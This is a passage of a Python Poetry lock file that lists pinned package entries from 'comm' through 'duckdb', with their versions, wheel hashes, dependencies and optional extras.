[package.extras] cron = ["capturer (>=2.4)"] [[package]] name = "comm" version = "0.1.4" description = "Jupyter Python Comm implementation, for usage in ipykernel, xeus-python etc." optional = false python-versions = ">=3.6" files = [ {file = "comm-0.1.4-py3-none-any.whl", hash = "sha256:6d52794cba11b36ed9860999cd10fd02d6b2eac177068fdd585e1e2f8a96e67a"}, {file = "comm-0.1.4.tar.gz", hash = "sha256:354e40a59c9dd6db50c5cc6b4acc887d82e9603787f83b68c01a80a923984d15"}, ] [package.dependencies] traitlets = ">=4" [package.extras] lint = ["black (>=22.6.0)", "mdformat (>0.7)", "mdformat-gfm (>=0.3.5)", "ruff (>=0.0.156)"] test = ["pytest"] typing = ["mypy (>=0.990)"] [[package]] name = "coverage" version = "7.3.2" description = "Code coverage measurement for Python" optional = false python-versions = ">=3.8" files = [ {file = "coverage-7.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d872145f3a3231a5f20fd48500274d7df222e291d90baa2026cc5152b7ce86bf"}, {file = "coverage-7.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:310b3bb9c91ea66d59c53fa4989f57d2436e08f18fb2f421a1b0b6b8cc7fffda"}, {file = "coverage-7.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f47d39359e2c3779c5331fc740cf4bce6d9d680a7b4b4ead97056a0ae07cb49a"}, {file = "coverage-7.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:aa72dbaf2c2068404b9870d93436e6d23addd8bbe9295f49cbca83f6e278179c"}, {file = "coverage-7.3.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:beaa5c1b4777f03fc63dfd2a6bd820f73f036bfb10e925fce067b00a340d0f3f"}, {file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:dbc1b46b92186cc8074fee9d9fbb97a9dd06c6cbbef391c2f59d80eabdf0faa6"}, {file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:315a989e861031334d7bee1f9113c8770472db2ac484e5b8c3173428360a9148"}, {file = "coverage-7.3.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:d1bc430677773397f64a5c88cb522ea43175ff16f8bfcc89d467d974cb2274f9"}, {file = "coverage-7.3.2-cp310-cp310-win32.whl", hash = "sha256:a889ae02f43aa45032afe364c8ae84ad3c54828c2faa44f3bfcafecb5c96b02f"}, {file = "coverage-7.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:c0ba320de3fb8c6ec16e0be17ee1d3d69adcda99406c43c0409cb5c41788a611"}, {file = "coverage-7.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ac8c802fa29843a72d32ec56d0ca792ad15a302b28ca6203389afe21f8fa062c"}, {file = "coverage-7.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:89a937174104339e3a3ffcf9f446c00e3a806c28b1841c63edb2b369310fd074"}, {file = "coverage-7.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e267e9e2b574a176ddb983399dec325a80dbe161f1a32715c780b5d14b5f583a"}, {file = "coverage-7.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2443cbda35df0d35dcfb9bf8f3c02c57c1d6111169e3c85fc1fcc05e0c9f39a3"}, {file = "coverage-7.3.2-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4175e10cc8dda0265653e8714b3174430b07c1dca8957f4966cbd6c2b1b8065a"}, {file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0cbf38419fb1a347aaf63481c00f0bdc86889d9fbf3f25109cf96c26b403fda1"}, {file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:5c913b556a116b8d5f6ef834038ba983834d887d82187c8f73dec21049abd65c"}, {file = "coverage-7.3.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:1981f785239e4e39e6444c63a98da3a1db8e971cb9ceb50a945ba6296b43f312"}, {file = "coverage-7.3.2-cp311-cp311-win32.whl", hash = "sha256:43668cabd5ca8258f5954f27a3aaf78757e6acf13c17604d89648ecc0cc66640"}, {file = "coverage-7.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:e10c39c0452bf6e694511c901426d6b5ac005acc0f78ff265dbe36bf81f808a2"}, {file = "coverage-7.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:4cbae1051ab791debecc4a5dcc4a1ff45fc27b91b9aee165c8a27514dd160836"}, {file = "coverage-7.3.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:12d15ab5833a997716d76f2ac1e4b4d536814fc213c85ca72756c19e5a6b3d63"}, {file = "coverage-7.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c7bba973ebee5e56fe9251300c00f1579652587a9f4a5ed8404b15a0471f216"}, {file = "coverage-7.3.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fe494faa90ce6381770746077243231e0b83ff3f17069d748f645617cefe19d4"}, {file = "coverage-7.3.2-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f6e9589bd04d0461a417562649522575d8752904d35c12907d8c9dfeba588faf"}, {file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:d51ac2a26f71da1b57f2dc81d0e108b6ab177e7d30e774db90675467c847bbdf"}, {file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:99b89d9f76070237975b315b3d5f4d6956ae354a4c92ac2388a5695516e47c84"}, {file = "coverage-7.3.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:fa28e909776dc69efb6ed975a63691bc8172b64ff357e663a1bb06ff3c9b589a"}, {file = "coverage-7.3.2-cp312-cp312-win32.whl", hash = "sha256:289fe43bf45a575e3ab10b26d7b6f2ddb9ee2dba447499f5401cfb5ecb8196bb"}, {file = "coverage-7.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:7dbc3ed60e8659bc59b6b304b43ff9c3ed858da2839c78b804973f613d3e92ed"}, {file = "coverage-7.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f94b734214ea6a36fe16e96a70d941af80ff3bfd716c141300d95ebc85339738"}, {file = "coverage-7.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:af3d828d2c1cbae52d34bdbb22fcd94d1ce715d95f1a012354a75e5913f1bda2"}, {file = "coverage-7.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:630b13e3036e13c7adc480ca42fa7afc2a5d938081d28e20903cf7fd687872e2"}, {file = "coverage-7.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c9eacf273e885b02a0273bb3a2170f30e2d53a6d53b72dbe02d6701b5296101c"}, {file = "coverage-7.3.2-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d8f17966e861ff97305e0801134e69db33b143bbfb36436efb9cfff6ec7b2fd9"}, {file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b4275802d16882cf9c8b3d057a0839acb07ee9379fa2749eca54efbce1535b82"}, {file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:72c0cfa5250f483181e677ebc97133ea1ab3eb68645e494775deb6a7f6f83901"}, {file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:cb536f0dcd14149425996821a168f6e269d7dcd2c273a8bff8201e79f5104e76"}, {file = "coverage-7.3.2-cp38-cp38-win32.whl", hash = "sha256:307adb8bd3abe389a471e649038a71b4eb13bfd6b7dd9a129fa856f5c695cf92"}, {file = "coverage-7.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:88ed2c30a49ea81ea3b7f172e0269c182a44c236eb394718f976239892c0a27a"}, {file = "coverage-7.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:b631c92dfe601adf8f5ebc7fc13ced6bb6e9609b19d9a8cd59fa47c4186ad1ce"}, {file = "coverage-7.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:d3d9df4051c4a7d13036524b66ecf7a7537d14c18a384043f30a303b146164e9"}, {file = "coverage-7.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5f7363d3b6a1119ef05015959ca24a9afc0ea8a02c687fe7e2d557705375c01f"}, {file = "coverage-7.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2f11cc3c967a09d3695d2a6f03fb3e6236622b93be7a4b5dc09166a861be6d25"}, {file = "coverage-7.3.2-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:149de1d2401ae4655c436a3dced6dd153f4c3309f599c3d4bd97ab172eaf02d9"}, {file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:3a4006916aa6fee7cd38db3bfc95aa9c54ebb4ffbfc47c677c8bba949ceba0a6"}, {file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9028a3871280110d6e1aa2df1afd5ef003bab5fb1ef421d6dc748ae1c8ef2ebc"}, {file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9f805d62aec8eb92bab5b61c0f07329275b6f41c97d80e847b03eb894f38d083"}, {file = "coverage-7.3.2-cp39-cp39-win32.whl", hash = "sha256:d1c88ec1a7ff4ebca0219f5b1ef863451d828cccf889c173e1253aa84b1e07ce"}, {file = "coverage-7.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:b4767da59464bb593c07afceaddea61b154136300881844768037fd5e859353f"}, {file = "coverage-7.3.2-pp38.pp39.pp310-none-any.whl", hash = "sha256:ae97af89f0fbf373400970c0a21eef5aa941ffeed90aee43650b81f7d7f47637"}, {file = "coverage-7.3.2.tar.gz", hash = "sha256:be32ad29341b0170e795ca590e1c07e81fc061cb5b10c74ce7203491484404ef"}, ] [package.dependencies] tomli = {version = "*", optional = true, markers = "python_full_version <= \"3.11.0a6\" and extra == \"toml\""} [package.extras] toml = ["tomli"] [[package]] name = "cryptography" version = "41.0.5" description = "cryptography is a package which provides cryptographic recipes and primitives to Python developers." optional = false python-versions = ">=3.7" files = [ {file = "cryptography-41.0.5-cp37-abi3-macosx_10_12_universal2.whl", hash = "sha256:da6a0ff8f1016ccc7477e6339e1d50ce5f59b88905585f77193ebd5068f1e797"}, {file = "cryptography-41.0.5-cp37-abi3-macosx_10_12_x86_64.whl", hash = "sha256:b948e09fe5fb18517d99994184854ebd50b57248736fd4c720ad540560174ec5"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d38e6031e113b7421db1de0c1b1f7739564a88f1684c6b89234fbf6c11b75147"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e270c04f4d9b5671ebcc792b3ba5d4488bf7c42c3c241a3748e2599776f29696"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:ec3b055ff8f1dce8e6ef28f626e0972981475173d7973d63f271b29c8a2897da"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:7d208c21e47940369accfc9e85f0de7693d9a5d843c2509b3846b2db170dfd20"}, {file = "cryptography-41.0.5-cp37-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:8254962e6ba1f4d2090c44daf50a547cd5f0bf446dc658a8e5f8156cae0d8548"}, {file = "cryptography-41.0.5-cp37-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:a48e74dad1fb349f3dc1d449ed88e0017d792997a7ad2ec9587ed17405667e6d"}, {file = "cryptography-41.0.5-cp37-abi3-win32.whl", hash = "sha256:d3977f0e276f6f5bf245c403156673db103283266601405376f075c849a0b936"}, {file = "cryptography-41.0.5-cp37-abi3-win_amd64.whl", hash = "sha256:73801ac9736741f220e20435f84ecec75ed70eda90f781a148f1bad546963d81"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:3be3ca726e1572517d2bef99a818378bbcf7d7799d5372a46c79c29eb8d166c1"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:e886098619d3815e0ad5790c973afeee2c0e6e04b4da90b88e6bd06e2a0b1b72"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:573eb7128cbca75f9157dcde974781209463ce56b5804983e11a1c462f0f4e88"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:0c327cac00f082013c7c9fb6c46b7cc9fa3c288ca702c74773968173bda421bf"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-macosx_10_12_x86_64.whl", hash = "sha256:227ec057cd32a41c6651701abc0328135e472ed450f47c2766f23267b792a88e"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:22892cc830d8b2c89ea60148227631bb96a7da0c1b722f2aac8824b1b7c0b6b8"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:5a70187954ba7292c7876734183e810b728b4f3965fbe571421cb2434d279179"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:88417bff20162f635f24f849ab182b092697922088b477a7abd6664ddd82291d"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c707f7afd813478e2019ae32a7c49cd932dd60ab2d2a93e796f68236b7e1fbf1"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:580afc7b7216deeb87a098ef0674d6ee34ab55993140838b14c9b83312b37b86"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:fba1e91467c65fe64a82c689dc6cf58151158993b13eb7a7f3f4b7f395636723"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:0d2a6a598847c46e3e321a7aef8af1436f11c27f1254933746304ff014664d84"}, {file = "cryptography-41.0.5.tar.gz", hash = "sha256:392cb88b597247177172e02da6b7a63deeff1937fa6fec3bbf902ebd75d97ec7"}, ] [package.dependencies] cffi = ">=1.12" [package.extras] docs = ["sphinx (>=5.3.0)", "sphinx-rtd-theme (>=1.1.1)"] docstest = ["pyenchant (>=1.6.11)", "sphinxcontrib-spelling (>=4.0.1)", "twine (>=1.12.0)"] nox = ["nox"] pep8test = ["black", "check-sdist", "mypy", "ruff"] sdist = ["build"] ssh = ["bcrypt (>=3.1.5)"] test = ["pretend", "pytest (>=6.2.0)", "pytest-benchmark", "pytest-cov", "pytest-xdist"] test-randomorder = ["pytest-randomly"] [[package]] name = "cssselect" version = "1.2.0" description = "cssselect parses CSS3 Selectors and translates them to XPath 1.0" optional = true python-versions = ">=3.7" files = [ {file = "cssselect-1.2.0-py2.py3-none-any.whl", hash = "sha256:da1885f0c10b60c03ed5eccbb6b68d6eff248d91976fcde348f395d54c9fd35e"}, {file = "cssselect-1.2.0.tar.gz", hash = "sha256:666b19839cfaddb9ce9d36bfe4c969132c647b92fc9088c4e23f786b30f1b3dc"}, ] [[package]] name = "dashvector" version = "1.0.5" description = "DashVector Client Python Sdk Library" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "dashvector-1.0.5-py3-none-any.whl", hash = "sha256:a79e5bdb0d6447706cbf3645d9f1d07fa8e280d74842491aaa54e74258def2d6"}, {file = "dashvector-1.0.5.tar.gz", hash = "sha256:2ee9a8c26699b9d978e7d84ff1cd92fa7ea5411c557ef5fb2a3fea02bd9999c4"}, ] [package.dependencies] aiohttp = ">=3.1.0,<4.0.0" grpcio = [ {version = ">=1.49.1", markers = "python_version >= \"3.11\""}, {version = ">=1.22.0", markers = "python_version < \"3.11\""}, ] numpy = "*" protobuf = ">=3.8.0,<4.0.0" [[package]] name = "dataclasses-json" version = "0.6.1" description = "Easily serialize dataclasses to and from JSON." optional = false python-versions = ">=3.7,<4.0" files = [ {file = "dataclasses_json-0.6.1-py3-none-any.whl", hash = "sha256:1bd8418a61fe3d588bb0079214d7fb71d44937da40742b787256fd53b26b6c80"}, {file = "dataclasses_json-0.6.1.tar.gz", hash = "sha256:a53c220c35134ce08211a1057fd0e5bf76dc5331627c6b241cacbc570a89faae"}, ] [package.dependencies] marshmallow = ">=3.18.0,<4.0.0" typing-inspect = ">=0.4.0,<1" [[package]] name = "debugpy" version = "1.8.0" description = "An implementation of the Debug Adapter Protocol for Python" optional = false python-versions = ">=3.8" files = [ {file = "debugpy-1.8.0-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:7fb95ca78f7ac43393cd0e0f2b6deda438ec7c5e47fa5d38553340897d2fbdfb"}, {file = "debugpy-1.8.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef9ab7df0b9a42ed9c878afd3eaaff471fce3fa73df96022e1f5c9f8f8c87ada"}, {file = "debugpy-1.8.0-cp310-cp310-win32.whl", hash = "sha256:a8b7a2fd27cd9f3553ac112f356ad4ca93338feadd8910277aff71ab24d8775f"}, {file = "debugpy-1.8.0-cp310-cp310-win_amd64.whl", hash = "sha256:5d9de202f5d42e62f932507ee8b21e30d49aae7e46d5b1dd5c908db1d7068637"}, {file = "debugpy-1.8.0-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:ef54404365fae8d45cf450d0544ee40cefbcb9cb85ea7afe89a963c27028261e"}, {file = "debugpy-1.8.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:60009b132c91951354f54363f8ebdf7457aeb150e84abba5ae251b8e9f29a8a6"}, {file = "debugpy-1.8.0-cp311-cp311-win32.whl", hash = "sha256:8cd0197141eb9e8a4566794550cfdcdb8b3db0818bdf8c49a8e8f8053e56e38b"}, {file = "debugpy-1.8.0-cp311-cp311-win_amd64.whl", hash = "sha256:a64093656c4c64dc6a438e11d59369875d200bd5abb8f9b26c1f5f723622e153"}, {file = "debugpy-1.8.0-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:b05a6b503ed520ad58c8dc682749113d2fd9f41ffd45daec16e558ca884008cd"}, {file = "debugpy-1.8.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3c6fb41c98ec51dd010d7ed650accfd07a87fe5e93eca9d5f584d0578f28f35f"}, {file = "debugpy-1.8.0-cp38-cp38-win32.whl", hash = "sha256:46ab6780159eeabb43c1495d9c84cf85d62975e48b6ec21ee10c95767c0590aa"}, {file = "debugpy-1.8.0-cp38-cp38-win_amd64.whl", hash = "sha256:bdc5ef99d14b9c0fcb35351b4fbfc06ac0ee576aeab6b2511702e5a648a2e595"}, {file = "debugpy-1.8.0-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:61eab4a4c8b6125d41a34bad4e5fe3d2cc145caecd63c3fe953be4cc53e65bf8"}, {file = "debugpy-1.8.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:125b9a637e013f9faac0a3d6a82bd17c8b5d2c875fb6b7e2772c5aba6d082332"}, {file = "debugpy-1.8.0-cp39-cp39-win32.whl", hash = "sha256:57161629133113c97b387382045649a2b985a348f0c9366e22217c87b68b73c6"}, {file = "debugpy-1.8.0-cp39-cp39-win_amd64.whl", hash = "sha256:e3412f9faa9ade82aa64a50b602544efcba848c91384e9f93497a458767e6926"}, {file = "debugpy-1.8.0-py2.py3-none-any.whl", hash = "sha256:9c9b0ac1ce2a42888199df1a1906e45e6f3c9555497643a85e0bf2406e3ffbc4"}, {file = "debugpy-1.8.0.zip", hash = "sha256:12af2c55b419521e33d5fb21bd022df0b5eb267c3e178f1d374a63a2a6bdccd0"}, ] [[package]] name = "decorator" version = "5.1.1" description = "Decorators for Humans" optional = false python-versions = ">=3.5" files = [ {file = "decorator-5.1.1-py3-none-any.whl", hash = "sha256:b8c3f85900b9dc423225913c5aace94729fe1fa9763b38939a95226f02d37186"}, {file = "decorator-5.1.1.tar.gz", hash = "sha256:637996211036b6385ef91435e4fae22989472f9d571faba8927ba8253acbc330"}, ] [[package]] name = "deeplake" version = "3.8.3" description = "Activeloop Deep Lake" optional = true python-versions = "*" files = [ {file = "deeplake-3.8.3.tar.gz", hash = "sha256:db6ea8b50549bab35579c2a6d70888356162d9aa89c18b55c16a9f5aeaf4a5fe"}, ] [package.dependencies] aioboto3 = {version = ">=10.4.0", markers = "python_version >= \"3.7\" and sys_platform != \"win32\""} boto3 = "*" click = "*" humbug = ">=0.3.1" libdeeplake = "0.0.84" lz4 = "*" nest_asyncio = {version = "*", markers = "python_version >= \"3.7\" and sys_platform != \"win32\""} numpy = "*" pathos = "*" pillow = "*" pyjwt = "*" tqdm = "*" [package.extras] all = ["IPython", "av (>=8.1.0)", "azure-cli", "azure-identity", "azure-storage-blob", "flask", "google-api-python-client (>=2.31.0,<2.32.0)", "google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "google-cloud-storage (>=1.42.0,<1.43.0)", "laspy", "libdeeplake (==0.0.84)", "nibabel", "oauth2client (>=4.1.3,<4.2.0)", "pydicom"] audio = ["av (>=8.1.0)"] av = ["av (>=8.1.0)"] azure = ["azure-cli", "azure-identity", "azure-storage-blob"] dicom = ["nibabel", "pydicom"] enterprise = ["libdeeplake (==0.0.84)", "pyjwt"] gcp = ["google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "google-cloud-storage (>=1.42.0,<1.43.0)"] gdrive = ["google-api-python-client (>=2.31.0,<2.32.0)", "google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "oauth2client (>=4.1.3,<4.2.0)"] medical = ["nibabel", "pydicom"] point-cloud = ["laspy"] video = ["av (>=8.1.0)"] visualizer = ["IPython", "flask"] [[package]] name = "defusedxml" version = "0.7.1" description = "XML bomb protection for Python stdlib modules" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"}, {file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"}, ] [[package]] name = "deprecated" version = "1.2.14" description = "Python @deprecated decorator to deprecate old python classes, functions or methods." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "Deprecated-1.2.14-py2.py3-none-any.whl", hash = "sha256:6fac8b097794a90302bdbb17b9b815e732d3c4720583ff1b198499d78470466c"}, {file = "Deprecated-1.2.14.tar.gz", hash = "sha256:e5323eb936458dccc2582dc6f9c322c852a775a27065ff2b0c4970b9d53d01b3"}, ] [package.dependencies] wrapt = ">=1.10,<2" [package.extras] dev = ["PyTest", "PyTest-Cov", "bump2version (<1)", "sphinx (<2)", "tox"] [[package]] name = "deprecation" version = "2.1.0" description = "A library to handle automated deprecations" optional = true python-versions = "*" files = [ {file = "deprecation-2.1.0-py2.py3-none-any.whl", hash = "sha256:a10811591210e1fb0e768a8c25517cabeabcba6f0bf96564f8ff45189f90b14a"}, {file = "deprecation-2.1.0.tar.gz", hash = "sha256:72b3bde64e5d778694b0cf68178aed03d15e15477116add3fb773e581f9518ff"}, ] [package.dependencies] packaging = "*" [[package]] name = "dill" version = "0.3.7" description = "serialize all of Python" optional = true python-versions = ">=3.7" files = [ {file = "dill-0.3.7-py3-none-any.whl", hash = "sha256:76b122c08ef4ce2eedcd4d1abd8e641114bfc6c2867f49f3c41facf65bf19f5e"}, {file = "dill-0.3.7.tar.gz", hash = "sha256:cc1c8b182eb3013e24bd475ff2e9295af86c1a38eb1aff128dac8962a9ce3c03"}, ] [package.extras] graph = ["objgraph (>=1.7.2)"] [[package]] name = "distro" version = "1.8.0" description = "Distro - an OS platform information API" optional = false python-versions = ">=3.6" files = [ {file = "distro-1.8.0-py3-none-any.whl", hash = "sha256:99522ca3e365cac527b44bde033f64c6945d90eb9f769703caaec52b09bbd3ff"}, {file = "distro-1.8.0.tar.gz", hash = "sha256:02e111d1dc6a50abb8eed6bf31c3e48ed8b0830d1ea2a1b78c61765c2513fdd8"}, ] [[package]] name = "dnspython" version = "2.4.2" description = "DNS toolkit" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "dnspython-2.4.2-py3-none-any.whl", hash = "sha256:57c6fbaaeaaf39c891292012060beb141791735dbb4004798328fc2c467402d8"}, {file = "dnspython-2.4.2.tar.gz", hash = "sha256:8dcfae8c7460a2f84b4072e26f1c9f4101ca20c071649cb7c34e8b6a93d58984"}, ] [package.extras] dnssec = ["cryptography (>=2.6,<42.0)"] doh = ["h2 (>=4.1.0)", "httpcore (>=0.17.3)", "httpx (>=0.24.1)"] doq = ["aioquic (>=0.9.20)"] idna = ["idna (>=2.1,<4.0)"] trio = ["trio (>=0.14,<0.23)"] wmi = ["wmi (>=1.5.1,<2.0.0)"] [[package]] name = "docarray" version = "0.32.1" description = "The data structure for multimodal data" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "docarray-0.32.1-py3-none-any.whl", hash = "sha256:abd6d8999f44fd37b0c1d54f7cedd9007ab13b8b6c69933a9d30abbd0cbad5cd"}, {file = "docarray-0.32.1.tar.gz", hash = "sha256:ef349d2501d5cb0f205497e5e7de5b5d034965bdad98cf6daab1baa6aa3e39d2"}, ] [package.dependencies] hnswlib = {version = ">=0.6.2", optional = true, markers = "extra == \"hnswlib\""} numpy = ">=1.17.3" orjson = ">=3.8.2" protobuf = {version = ">=3.19.0", optional = true, markers = "extra == \"proto\" or extra == \"hnswlib\" or extra == \"full\""} pydantic = ">=1.10.2" rich = ">=13.1.0" types-requests = ">=2.28.11.6" typing-inspect = ">=0.8.0" [package.extras] audio = ["pydub (>=0.25.1,<0.26.0)"] aws = ["smart-open[s3] (>=6.3.0)"] elasticsearch = ["elastic-transport (>=8.4.0,<9.0.0)", "elasticsearch (>=7.10.1)"] full = ["av (>=10.0.0)", "lz4 (>=1.0.0)", "pandas (>=1.1.0)", "pillow (>=9.3.0)", "protobuf (>=3.19.0)", "pydub (>=0.25.1,<0.26.0)", "trimesh[easy] (>=3.17.1)", "types-pillow (>=9.3.0.1)"] hnswlib = ["hnswlib (>=0.6.2)", "protobuf (>=3.19.0)"] image = ["pillow (>=9.3.0)", "types-pillow (>=9.3.0.1)"] jac = ["jina-hubble-sdk (>=0.34.0)"] mesh = ["trimesh[easy] (>=3.17.1)"] pandas = ["pandas (>=1.1.0)"] proto = ["lz4 (>=1.0.0)", "protobuf (>=3.19.0)"] qdrant = ["qdrant-client (>=1.1.4)"] torch = ["torch (>=1.0.0)"] video = ["av (>=10.0.0)"] weaviate = ["weaviate-client (>=3.15)"] web = ["fastapi (>=0.87.0)"] [[package]] name = "docker" version = "6.1.3" description = "A Python library for the Docker Engine API." optional = true python-versions = ">=3.7" files = [ {file = "docker-6.1.3-py3-none-any.whl", hash = "sha256:aecd2277b8bf8e506e484f6ab7aec39abe0038e29fa4a6d3ba86c3fe01844ed9"}, {file = "docker-6.1.3.tar.gz", hash = "sha256:aa6d17830045ba5ef0168d5eaa34d37beeb113948c413affe1d5991fc11f9a20"}, ] [package.dependencies] packaging = ">=14.0" pywin32 = {version = ">=304", markers = "sys_platform == \"win32\""} requests = ">=2.26.0" urllib3 = ">=1.26.0" websocket-client = ">=0.32.0" [package.extras] ssh = ["paramiko (>=2.4.3)"] [[package]] name = "docopt" version = "0.6.2" description = "Pythonic argument parser, that will make you smile" optional = true python-versions = "*" files = [ {file = "docopt-0.6.2.tar.gz", hash = "sha256:49b3a825280bd66b3aa83585ef59c4a8c82f2c8a522dbe754a8bc8d08c85c491"}, ] [[package]] name = "duckdb" version = "0.9.1" description = "DuckDB embedded database" optional = false python-versions = ">=3.7.0" files = [ {file = "duckdb-0.9.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6c724e105ecd78c8d86b3c03639b24e1df982392fc836705eb007e4b1b488864"}, {file = "duckdb-0.9.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:75f12c5a3086079fb6440122565f1762ef1a610a954f2d8081014c1dd0646e1a"}, {file = "duckdb-0.9.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:151f5410c32f8f8fe03bf23462b9604349bc0b4bd3a51049bbf5e6a482a435e8"}, {file = 